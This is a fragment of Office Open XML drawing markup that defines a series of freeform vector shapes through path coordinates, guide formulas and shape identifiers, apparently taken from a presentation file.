                    <a:lnTo>
                      <a:pt x="40" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="43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44" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47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4" y="5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7" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="3"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="A05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1" name="Freeform 136">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA79B50F-F8D9-4922-AC3C-94A6F174C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299"/>
                <a:ext cx="68" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 67 w 68"/>
                  <a:gd name="T1" fmla="*/ 21 h 37"/>
                  <a:gd name="T2" fmla="*/ 58 w 68"/>
                  <a:gd name="T3" fmla="*/ 19 h 37"/>
                  <a:gd name="T4" fmla="*/ 55 w 68"/>
                  <a:gd name="T5" fmla="*/ 18 h 37"/>
                  <a:gd name="T6" fmla="*/ 53 w 68"/>
                  <a:gd name="T7" fmla="*/ 18 h 37"/>
                  <a:gd name="T8" fmla="*/ 51 w 68"/>
                  <a:gd name="T9" fmla="*/ 15 h 37"/>
                  <a:gd name="T10" fmla="*/ 47 w 68"/>
                  <a:gd name="T11" fmla="*/ 12 h 37"/>
                  <a:gd name="T12" fmla="*/ 40 w 68"/>
                  <a:gd name="T13" fmla="*/ 6 h 37"/>
                  <a:gd name="T14" fmla="*/ 39 w 68"/>
                  <a:gd name="T15" fmla="*/ 5 h 37"/>
                  <a:gd name="T16" fmla="*/ 37 w 68"/>
                  <a:gd name="T17" fmla="*/ 3 h 37"/>
                  <a:gd name="T18" fmla="*/ 33 w 68"/>
                  <a:gd name="T19" fmla="*/ 2 h 37"/>
                  <a:gd name="T20" fmla="*/ 21 w 68"/>
                  <a:gd name="T21" fmla="*/ 0 h 37"/>
                  <a:gd name="T22" fmla="*/ 18 w 68"/>
                  <a:gd name="T23" fmla="*/ 0 h 37"/>
                  <a:gd name="T24" fmla="*/ 15 w 68"/>
                  <a:gd name="T25" fmla="*/ 1 h 37"/>
                  <a:gd name="T26" fmla="*/ 14 w 68"/>
                  <a:gd name="T27" fmla="*/ 2 h 37"/>
                  <a:gd name="T28" fmla="*/ 6 w 68"/>
                  <a:gd name="T29" fmla="*/ 4 h 37"/>
                  <a:gd name="T30" fmla="*/ 5 w 68"/>
                  <a:gd name="T31" fmla="*/ 5 h 37"/>
                  <a:gd name="T32" fmla="*/ 4 w 68"/>
                  <a:gd name="T33" fmla="*/ 6 h 37"/>
                  <a:gd name="T34" fmla="*/ 2 w 68"/>
                  <a:gd name="T35" fmla="*/ 9 h 37"/>
                  <a:gd name="T36" fmla="*/ 1 w 68"/>
                  <a:gd name="T37" fmla="*/ 11 h 37"/>
                  <a:gd name="T38" fmla="*/ 0 w 68"/>
                  <a:gd name="T39" fmla="*/ 12 h 37"/>
                  <a:gd name="T40" fmla="*/ 0 w 68"/>
                  <a:gd name="T41" fmla="*/ 14 h 37"/>
                  <a:gd name="T42" fmla="*/ 0 w 68"/>
                  <a:gd name="T43" fmla="*/ 15 h 37"/>
                  <a:gd name="T44" fmla="*/ 1 w 68"/>
                  <a:gd name="T45" fmla="*/ 16 h 37"/>
                  <a:gd name="T46" fmla="*/ 4 w 68"/>
                  <a:gd name="T47" fmla="*/ 16 h 37"/>
                  <a:gd name="T48" fmla="*/ 8 w 68"/>
                  <a:gd name="T49" fmla="*/ 14 h 37"/>
                  <a:gd name="T50" fmla="*/ 14 w 68"/>
                  <a:gd name="T51" fmla="*/ 13 h 37"/>
                  <a:gd name="T52" fmla="*/ 19 w 68"/>
                  <a:gd name="T53" fmla="*/ 14 h 37"/>
                  <a:gd name="T54" fmla="*/ 14 w 68"/>
                  <a:gd name="T55" fmla="*/ 15 h 37"/>
                  <a:gd name="T56" fmla="*/ 10 w 68"/>
                  <a:gd name="T57" fmla="*/ 16 h 37"/>
                  <a:gd name="T58" fmla="*/ 6 w 68"/>
                  <a:gd name="T59" fmla="*/ 18 h 37"/>
                  <a:gd name="T60" fmla="*/ 5 w 68"/>
                  <a:gd name="T61" fmla="*/ 18 h 37"/>
                  <a:gd name="T62" fmla="*/ 5 w 68"/>
                  <a:gd name="T63" fmla="*/ 20 h 37"/>
                  <a:gd name="T64" fmla="*/ 6 w 68"/>
                  <a:gd name="T65" fmla="*/ 21 h 37"/>
                  <a:gd name="T66" fmla="*/ 8 w 68"/>
                  <a:gd name="T67" fmla="*/ 20 h 37"/>
                  <a:gd name="T68" fmla="*/ 15 w 68"/>
                  <a:gd name="T69" fmla="*/ 19 h 37"/>
                  <a:gd name="T70" fmla="*/ 20 w 68"/>
                  <a:gd name="T71" fmla="*/ 19 h 37"/>
                  <a:gd name="T72" fmla="*/ 23 w 68"/>
                  <a:gd name="T73" fmla="*/ 19 h 37"/>
                  <a:gd name="T74" fmla="*/ 26 w 68"/>
                  <a:gd name="T75" fmla="*/ 20 h 37"/>
                  <a:gd name="T76" fmla="*/ 28 w 68"/>
                  <a:gd name="T77" fmla="*/ 23 h 37"/>
                  <a:gd name="T78" fmla="*/ 30 w 68"/>
                  <a:gd name="T79" fmla="*/ 26 h 37"/>
                  <a:gd name="T80" fmla="*/ 33 w 68"/>
                  <a:gd name="T81" fmla="*/ 29 h 37"/>
                  <a:gd name="T82" fmla="*/ 35 w 68"/>
                  <a:gd name="T83" fmla="*/ 31 h 37"/>
                  <a:gd name="T84" fmla="*/ 38 w 68"/>
                  <a:gd name="T85" fmla="*/ 33 h 37"/>
                  <a:gd name="T86" fmla="*/ 40 w 68"/>
                  <a:gd name="T87" fmla="*/ 33 h 37"/>
                  <a:gd name="T88" fmla="*/ 44 w 68"/>
                  <a:gd name="T89" fmla="*/ 33 h 37"/>
                  <a:gd name="T90" fmla="*/ 48 w 68"/>
                  <a:gd name="T91" fmla="*/ 33 h 37"/>
                  <a:gd name="T92" fmla="*/ 51 w 68"/>
                  <a:gd name="T93" fmla="*/ 33 h 37"/>
                  <a:gd name="T94" fmla="*/ 56 w 68"/>
                  <a:gd name="T95" fmla="*/ 34 h 37"/>
                  <a:gd name="T96" fmla="*/ 67 w 68"/>
                  <a:gd name="T97" fmla="*/ 36 h 37"/>
                  <a:gd name="T98" fmla="*/ 67 w 68"/>
                  <a:gd name="T99" fmla="*/ 21 h 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8"/>
                  <a:gd name="T151" fmla="*/ 0 h 37"/>
                  <a:gd name="T152" fmla="*/ 68 w 68"/>
                  <a:gd name="T153" fmla="*/ 37 h 3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8" h="37">
                    <a:moveTo>
                      <a:pt x="67" y="21"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="58" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33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1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4" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="14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5" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="19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8" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="21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2" name="Freeform 137">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F507974-35DB-478A-AE17-45EB0030E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0" y="2306"/>
                <a:ext cx="20" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 20"/>
                  <a:gd name="T1" fmla="*/ 16 h 17"/>
                  <a:gd name="T2" fmla="*/ 3 w 20"/>
                  <a:gd name="T3" fmla="*/ 8 h 17"/>
                  <a:gd name="T4" fmla="*/ 5 w 20"/>
                  <a:gd name="T5" fmla="*/ 8 h 17"/>
                  <a:gd name="T6" fmla="*/ 10 w 20"/>
                  <a:gd name="T7" fmla="*/ 8 h 17"/>
                  <a:gd name="T8" fmla="*/ 11 w 20"/>
                  <a:gd name="T9" fmla="*/ 0 h 17"/>
                  <a:gd name="T10" fmla="*/ 15 w 20"/>
                  <a:gd name="T11" fmla="*/ 8 h 17"/>
                  <a:gd name="T12" fmla="*/ 19 w 20"/>
                  <a:gd name="T13" fmla="*/ 8 h 17"/>
                  <a:gd name="T14" fmla="*/ 14 w 20"/>
                  <a:gd name="T15" fmla="*/ 0 h 17"/>
                  <a:gd name="T16" fmla="*/ 10 w 20"/>
                  <a:gd name="T17" fmla="*/ 0 h 17"/>
                  <a:gd name="T18" fmla="*/ 5 w 20"/>
                  <a:gd name="T19" fmla="*/ 8 h 17"/>
                  <a:gd name="T20" fmla="*/ 3 w 20"/>
                  <a:gd name="T21" fmla="*/ 8 h 17"/>
                  <a:gd name="T22" fmla="*/ 0 w 20"/>
                  <a:gd name="T23" fmla="*/ 16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7"/>
                  <a:gd name="T38" fmla="*/ 20 w 20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7">
                    <a:moveTo>
                      <a:pt x="0" y="16"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="8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3" name="Freeform 138">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D574E0C7-3B1B-4E5F-9ECC-25CEEEA6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2301"/>
                <a:ext cx="17" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4 w 17"/>
                  <a:gd name="T1" fmla="*/ 0 h 17"/>
                  <a:gd name="T2" fmla="*/ 2 w 17"/>
                  <a:gd name="T3" fmla="*/ 0 h 17"/>
                  <a:gd name="T4" fmla="*/ 0 w 17"/>
                  <a:gd name="T5" fmla="*/ 0 h 17"/>
                  <a:gd name="T6" fmla="*/ 1 w 17"/>
                  <a:gd name="T7" fmla="*/ 0 h 17"/>
                  <a:gd name="T8" fmla="*/ 4 w 17"/>
                  <a:gd name="T9" fmla="*/ 0 h 17"/>
                  <a:gd name="T10" fmla="*/ 8 w 17"/>
                  <a:gd name="T11" fmla="*/ 16 h 17"/>
                  <a:gd name="T12" fmla="*/ 11 w 17"/>
                  <a:gd name="T13" fmla="*/ 16 h 17"/>
                  <a:gd name="T14" fmla="*/ 14 w 17"/>
                  <a:gd name="T15" fmla="*/ 16 h 17"/>
                  <a:gd name="T16" fmla="*/ 16 w 17"/>
                  <a:gd name="T17" fmla="*/ 16 h 17"/>
                  <a:gd name="T18" fmla="*/ 11 w 17"/>
                  <a:gd name="T19" fmla="*/ 16 h 17"/>
                  <a:gd name="T20" fmla="*/ 8 w 17"/>
                  <a:gd name="T21" fmla="*/ 0 h 17"/>
                  <a:gd name="T22" fmla="*/ 4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1" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="0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4" name="Freeform 139">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4F0B57A-C68B-421D-BFDC-F10831450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" y="231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3 w 17"/>
                  <a:gd name="T3" fmla="*/ 16 h 17"/>
                  <a:gd name="T4" fmla="*/ 6 w 17"/>
                  <a:gd name="T5" fmla="*/ 16 h 17"/>
                  <a:gd name="T6" fmla="*/ 11 w 17"/>
                  <a:gd name="T7" fmla="*/ 16 h 17"/>
                  <a:gd name="T8" fmla="*/ 16 w 17"/>
                  <a:gd name="T9" fmla="*/ 0 h 17"/>
                  <a:gd name="T10" fmla="*/ 11 w 17"/>
                  <a:gd name="T11" fmla="*/ 0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3" y="16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5" name="Freeform 140">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB260330-67CE-42FA-B138-C592E7B1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8" y="2311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6 w 1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"/>
                  <a:gd name="T11" fmla="*/ 17 w 1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6" name="Freeform 141">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3358DBB0-A83E-4626-887C-7AF0250D7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317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9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7" name="Freeform 142">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33E24E57-3444-4C86-917C-D09D64BB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309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"/>
                  <a:gd name="T11" fmla="*/ 17 w 1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8" name="Freeform 143">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FD670F9-A3A5-4188-A12A-8B6567BAB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" y="230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2 w 17"/>
                  <a:gd name="T3" fmla="*/ 4 h 17"/>
                  <a:gd name="T4" fmla="*/ 5 w 17"/>
                  <a:gd name="T5" fmla="*/ 8 h 17"/>
                  <a:gd name="T6" fmla="*/ 16 w 17"/>
                  <a:gd name="T7" fmla="*/ 16 h 17"/>
                  <a:gd name="T8" fmla="*/ 5 w 17"/>
                  <a:gd name="T9" fmla="*/ 7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2" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5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79" name="Freeform 144">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEBC3DB4-21A0-4A95-9B84-7B4D65ABD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" y="232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4 h 17"/>
                  <a:gd name="T4" fmla="*/ 0 w 17"/>
                  <a:gd name="T5" fmla="*/ 11 h 17"/>
                  <a:gd name="T6" fmla="*/ 0 w 17"/>
                  <a:gd name="T7" fmla="*/ 16 h 17"/>
                  <a:gd name="T8" fmla="*/ 0 w 17"/>
                  <a:gd name="T9" fmla="*/ 8 h 17"/>
                  <a:gd name="T10" fmla="*/ 0 w 17"/>
                  <a:gd name="T11" fmla="*/ 4 h 17"/>
                  <a:gd name="T12" fmla="*/ 16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0" name="Freeform 145">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF8D015F-6272-4B01-A363-6B845C7E3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315"/>
                <a:ext cx="17" cy="1"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 11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11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1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1" name="Freeform 146">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5C879AC-6FBB-482D-A193-558251776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223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4 w 17"/>
                  <a:gd name="T3" fmla="*/ 0 h 1"/>
                  <a:gd name="T4" fmla="*/ 10 w 17"/>
                  <a:gd name="T5" fmla="*/ 0 h 1"/>
                  <a:gd name="T6" fmla="*/ 16 w 17"/>
                  <a:gd name="T7" fmla="*/ 0 h 1"/>
                  <a:gd name="T8" fmla="*/ 10 w 17"/>
                  <a:gd name="T9" fmla="*/ 0 h 1"/>
                  <a:gd name="T10" fmla="*/ 4 w 17"/>
                  <a:gd name="T11" fmla="*/ 0 h 1"/>
                  <a:gd name="T12" fmla="*/ 0 w 17"/>
                  <a:gd name="T13" fmla="*/ 0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"/>
                  <a:gd name="T23" fmla="*/ 17 w 17"/>
                  <a:gd name="T24" fmla="*/ 1 h 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2" name="Freeform 147">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74A14408-97ED-4EE9-9C0C-DEB3D08ED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22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3" name="Freeform 148">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F7FA4D1-7741-407E-BB78-FB5F746BA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" y="2242"/>
                <a:ext cx="40" cy="90"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 33 w 40"/>
                  <a:gd name="T1" fmla="*/ 0 h 90"/>
                  <a:gd name="T2" fmla="*/ 29 w 40"/>
                  <a:gd name="T3" fmla="*/ 3 h 90"/>
                  <a:gd name="T4" fmla="*/ 28 w 40"/>
                  <a:gd name="T5" fmla="*/ 8 h 90"/>
                  <a:gd name="T6" fmla="*/ 23 w 40"/>
                  <a:gd name="T7" fmla="*/ 14 h 90"/>
                  <a:gd name="T8" fmla="*/ 11 w 40"/>
                  <a:gd name="T9" fmla="*/ 38 h 90"/>
                  <a:gd name="T10" fmla="*/ 5 w 40"/>
                  <a:gd name="T11" fmla="*/ 60 h 90"/>
                  <a:gd name="T12" fmla="*/ 0 w 40"/>
                  <a:gd name="T13" fmla="*/ 89 h 90"/>
                  <a:gd name="T14" fmla="*/ 15 w 40"/>
                  <a:gd name="T15" fmla="*/ 76 h 90"/>
                  <a:gd name="T16" fmla="*/ 39 w 40"/>
                  <a:gd name="T17" fmla="*/ 11 h 90"/>
                  <a:gd name="T18" fmla="*/ 33 w 40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"/>
                  <a:gd name="T31" fmla="*/ 0 h 90"/>
                  <a:gd name="T32" fmla="*/ 40 w 40"/>
                  <a:gd name="T33" fmla="*/ 90 h 9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" h="90">
                    <a:moveTo>
                      <a:pt x="33" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="29" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="1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40000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4" name="Freeform 149">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03E845D4-CB36-4FAF-A4AA-F78995DC4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" y="2225"/>
                <a:ext cx="151" cy="150"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 122 w 151"/>
                  <a:gd name="T1" fmla="*/ 7 h 150"/>
                  <a:gd name="T2" fmla="*/ 117 w 151"/>
                  <a:gd name="T3" fmla="*/ 0 h 150"/>
                  <a:gd name="T4" fmla="*/ 81 w 151"/>
                  <a:gd name="T5" fmla="*/ 13 h 150"/>
                  <a:gd name="T6" fmla="*/ 79 w 151"/>
                  <a:gd name="T7" fmla="*/ 24 h 150"/>
                  <a:gd name="T8" fmla="*/ 75 w 151"/>
                  <a:gd name="T9" fmla="*/ 27 h 150"/>
                  <a:gd name="T10" fmla="*/ 71 w 151"/>
                  <a:gd name="T11" fmla="*/ 31 h 150"/>
                  <a:gd name="T12" fmla="*/ 70 w 151"/>
                  <a:gd name="T13" fmla="*/ 38 h 150"/>
                  <a:gd name="T14" fmla="*/ 61 w 151"/>
                  <a:gd name="T15" fmla="*/ 56 h 150"/>
                  <a:gd name="T16" fmla="*/ 55 w 151"/>
                  <a:gd name="T17" fmla="*/ 77 h 150"/>
                  <a:gd name="T18" fmla="*/ 52 w 151"/>
                  <a:gd name="T19" fmla="*/ 90 h 150"/>
                  <a:gd name="T20" fmla="*/ 22 w 151"/>
                  <a:gd name="T21" fmla="*/ 91 h 150"/>
                  <a:gd name="T22" fmla="*/ 17 w 151"/>
                  <a:gd name="T23" fmla="*/ 93 h 150"/>
                  <a:gd name="T24" fmla="*/ 4 w 151"/>
                  <a:gd name="T25" fmla="*/ 93 h 150"/>
                  <a:gd name="T26" fmla="*/ 0 w 151"/>
                  <a:gd name="T27" fmla="*/ 99 h 150"/>
                  <a:gd name="T28" fmla="*/ 0 w 151"/>
                  <a:gd name="T29" fmla="*/ 105 h 150"/>
                  <a:gd name="T30" fmla="*/ 0 w 151"/>
                  <a:gd name="T31" fmla="*/ 110 h 150"/>
                  <a:gd name="T32" fmla="*/ 14 w 151"/>
                  <a:gd name="T33" fmla="*/ 112 h 150"/>
                  <a:gd name="T34" fmla="*/ 19 w 151"/>
                  <a:gd name="T35" fmla="*/ 121 h 150"/>
                  <a:gd name="T36" fmla="*/ 31 w 151"/>
                  <a:gd name="T37" fmla="*/ 123 h 150"/>
                  <a:gd name="T38" fmla="*/ 39 w 151"/>
                  <a:gd name="T39" fmla="*/ 123 h 150"/>
                  <a:gd name="T40" fmla="*/ 49 w 151"/>
                  <a:gd name="T41" fmla="*/ 125 h 150"/>
                  <a:gd name="T42" fmla="*/ 50 w 151"/>
                  <a:gd name="T43" fmla="*/ 128 h 150"/>
                  <a:gd name="T44" fmla="*/ 49 w 151"/>
                  <a:gd name="T45" fmla="*/ 135 h 150"/>
                  <a:gd name="T46" fmla="*/ 51 w 151"/>
                  <a:gd name="T47" fmla="*/ 141 h 150"/>
                  <a:gd name="T48" fmla="*/ 56 w 151"/>
                  <a:gd name="T49" fmla="*/ 142 h 150"/>
                  <a:gd name="T50" fmla="*/ 63 w 151"/>
                  <a:gd name="T51" fmla="*/ 144 h 150"/>
                  <a:gd name="T52" fmla="*/ 70 w 151"/>
                  <a:gd name="T53" fmla="*/ 149 h 150"/>
                  <a:gd name="T54" fmla="*/ 77 w 151"/>
                  <a:gd name="T55" fmla="*/ 149 h 150"/>
                  <a:gd name="T56" fmla="*/ 84 w 151"/>
                  <a:gd name="T57" fmla="*/ 148 h 150"/>
                  <a:gd name="T58" fmla="*/ 94 w 151"/>
                  <a:gd name="T59" fmla="*/ 145 h 150"/>
                  <a:gd name="T60" fmla="*/ 106 w 151"/>
                  <a:gd name="T61" fmla="*/ 146 h 150"/>
                  <a:gd name="T62" fmla="*/ 118 w 151"/>
                  <a:gd name="T63" fmla="*/ 149 h 150"/>
                  <a:gd name="T64" fmla="*/ 130 w 151"/>
                  <a:gd name="T65" fmla="*/ 146 h 150"/>
                  <a:gd name="T66" fmla="*/ 137 w 151"/>
                  <a:gd name="T67" fmla="*/ 138 h 150"/>
                  <a:gd name="T68" fmla="*/ 136 w 151"/>
                  <a:gd name="T69" fmla="*/ 131 h 150"/>
                  <a:gd name="T70" fmla="*/ 140 w 151"/>
                  <a:gd name="T71" fmla="*/ 120 h 150"/>
                  <a:gd name="T72" fmla="*/ 141 w 151"/>
                  <a:gd name="T73" fmla="*/ 106 h 150"/>
                  <a:gd name="T74" fmla="*/ 145 w 151"/>
                  <a:gd name="T75" fmla="*/ 94 h 150"/>
